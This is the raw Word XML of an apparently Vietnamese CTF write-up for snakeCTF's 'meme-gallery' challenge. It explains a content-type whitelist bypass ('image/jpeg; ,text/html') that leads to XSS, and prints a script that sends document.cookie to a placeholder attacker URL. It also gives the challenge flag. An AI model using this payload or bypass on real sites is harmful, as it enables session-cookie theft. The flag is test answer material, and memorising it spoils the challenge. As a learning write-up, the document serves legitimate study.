    <w:p w14:paraId="196FB21F" w14:textId="6D1121D5" w:rsidR="007726C6" w:rsidRDefault="007726C6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454BC8A9" w14:textId="0EA7105B" w:rsidR="007726C6" w:rsidRDefault="007726C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A2B342C" wp14:editId="306F3B8B">
            <wp:extent cx="5003800" cy="584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DF3B" w14:textId="3D6B9E05" w:rsidR="00ED335C" w:rsidRDefault="00ED335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FD7343" wp14:editId="325A2853">
            <wp:extent cx="4757444" cy="5393803"/>
            <wp:effectExtent l="0" t="0" r="508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6460" cy="5415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EB46" w14:textId="7FE3C4E0" w:rsidR="007726C6" w:rsidRDefault="007726C6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6004CD85" w14:textId="4A46FC0F" w:rsidR="007726C6" w:rsidRDefault="007726C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Phần mở rộng tập tin và content type đuọc kiểm tra t</w:t>
      </w:r>
      <w:r w:rsidR="00A246D3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>heo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> whitelist</w:t>
      </w:r>
      <w:r w:rsidR="00A246D3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, nhưng meme được lưu trữ với content type gốc chứ không phải loại được phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040AFA1" w14:textId="6C9E87B5" w:rsidR="00A246D3" w:rsidRDefault="00A246D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C90AE4" w14:textId="6BA3E6F3" w:rsidR="00A246D3" w:rsidRDefault="00A246D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Trên internet một nghiên cứu thú vị về content types có thể được dùng cho XSS trong trường hợp này. Một trong những thủ thuật Response Content-Type có thể được dùng để bypass whitelist. Ví dụ, có thể dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00A246D3">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>image/jpeg; ,text/html</w:t>
      </w:r>
      <w:r w:rsidRPr="00A246D3">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/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làm content type, thư viện mimeparse sẽ phân tích là </w:t>
      </w:r>
      <w:r w:rsidRPr="00A246D3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('image', 'jpeg', {})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (vì ,text/html không chứa các tham số hợp lệ vì </w:t>
      </w:r>
      <w:r w:rsidR="005A24ED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>không có dấu bằng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="005A24ED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nên trình duyệt sẽ hiểu là text/html, kết xuất thành trang html. Trang html có thể trích xuất cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C56ABF" w14:textId="509CE5DF" w:rsidR="005A24ED" w:rsidRDefault="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A2873E" w14:textId="77777777" w:rsidR="005A24ED" w:rsidRPr="005A24ED" w:rsidRDefault="005A24ED" w:rsidP="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A24ED">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B3222" w14:textId="77777777" w:rsidR="005A24ED" w:rsidRPr="005A24ED" w:rsidRDefault="005A24ED" w:rsidP="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A24ED">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F2FAC" w14:textId="77777777" w:rsidR="005A24ED" w:rsidRPr="005A24ED" w:rsidRDefault="005A24ED" w:rsidP="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A24ED">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        document.location='&lt;attacker_controlled_url&gt;/' + btoa(document.cookie);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B44B3EC" w14:textId="77777777" w:rsidR="005A24ED" w:rsidRPr="005A24ED" w:rsidRDefault="005A24ED" w:rsidP="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A24ED">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B747CA" w14:textId="77777777" w:rsidR="005A24ED" w:rsidRPr="005A24ED" w:rsidRDefault="005A24ED" w:rsidP="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A24ED">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2B769A" w14:textId="766915D7" w:rsidR="005A24ED" w:rsidRPr="005A24ED" w:rsidRDefault="005A24ED" w:rsidP="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A24ED">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877D56A" w14:textId="6843042B" w:rsidR="005A24ED" w:rsidRDefault="005A24ED" w:rsidP="005A24ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44963EB6" w14:textId="68A63021" w:rsidR="002D28BA" w:rsidRDefault="005A24E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Meme này có thể gửi đến bot và đánh cắp cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B79AC" w14:textId="77777777" w:rsidR="002D28BA" w:rsidRPr="00E3642F" w:rsidRDefault="002D28BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDDA6F1" w14:textId="4789BEC4" w:rsidR="00FB2F26" w:rsidRDefault="00FB2F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POST /upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A617687" w14:textId="7924CFA9" w:rsidR="00FB2F26" w:rsidRDefault="005A457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7E9B483" wp14:editId="7468F250">
            <wp:extent cx="5270500" cy="2070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761E" w14:textId="61A309C7" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BB0FED" w14:textId="46C586B3" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A4570">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://77304f221f9d8e5b454c14020c66831e.meme-gallery.challs.snakectf.org/list/exploit.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD582C" w14:textId="3ABC4CFA" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E1E71D" w14:textId="06630FE5" w:rsidR="005A4570" w:rsidRDefault="005A457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6B6B3E5" wp14:editId="6F96C727">
            <wp:extent cx="2499360" cy="3113102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2" t="8415" r="55015" b="7756"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2500092" cy="311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566E3" w14:textId="3D745BA6" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33ECC746" w14:textId="1AD2D38F" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A457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>Show it to the admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250AD2FE" w14:textId="2B4D1D09" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485FB60A" w14:textId="6A361BD6" w:rsidR="005A4570" w:rsidRPr="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A4570">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG=snakeCTF{w0w_7H1s_m3M3_R0ckS!!_bbd19f95f398a315}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAD002C" w14:textId="77777777" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D6DCD3" w14:textId="1B8B888A" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A4570">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lessons Learned from this challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301E422" w14:textId="77777777" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780B14E4" w14:textId="4D774833" w:rsidR="005A4570" w:rsidRDefault="005A457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1. Weak Secret Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492F185" w14:textId="67BB5AF4" w:rsidR="005A4570" w:rsidRDefault="005A457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2. SSTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41539B77" w14:textId="048773B4" w:rsidR="005A4570" w:rsidRDefault="005A457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3. XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E97A0A6" w14:textId="77777777" w:rsidR="005A4570" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AB7AA0" w14:textId="77777777" w:rsidR="005A4570" w:rsidRPr="00FB2F26" w:rsidRDefault="005A4570">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005A4570" w:rsidRPr="00FB2F2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93B48C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FCAD7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614BED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17E88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274"/>
    <w:rsid w:val="000D5B66"/>
    <w:rsid w:val="002A4709"/>
    <w:rsid w:val="002D28BA"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003F3092"/>
    <w:rsid w:val="00555B38"/>
    <w:rsid w:val="00561998"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005A24ED"/>
    <w:rsid w:val="005A4570"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="007726C6"/>
    <w:rsid w:val="007B47C0"/>
    <w:rsid w:val="00897E55"/>
    <w:rsid w:val="008F5D9F"/>
    <w:rsid w:val="00953AEF"/>
    <w:rsid w:val="00963FA6"/>
    <w:rsid w:val="00987A44"/>
    <w:rsid w:val="00A246D3"/>
    <w:rsid w:val="00A8149F"/>
    <w:rsid w:val="00AA699E"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C2759B"/>
    <w:rsid w:val="00C82274"/>
    <w:rsid w:val="00CA6DA8"/>
    <w:rsid w:val="00E3642F"/>
    <w:rsid w:val="00EB0EE9"/>
    <w:rsid w:val="00ED335C"/>
    <w:rsid w:val="00F23AE5"/>
    <w:rsid w:val="00F92415"/>
    <w:rsid w:val="00FB2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E91CB7A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BBFF4F56-6998-674E-95C2-F22F3E49B6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5A4570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2D28B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61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16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25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11</Pages>
  <Words>517</Words>
  <Characters>2951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2024-09-12T03:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-13T04:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>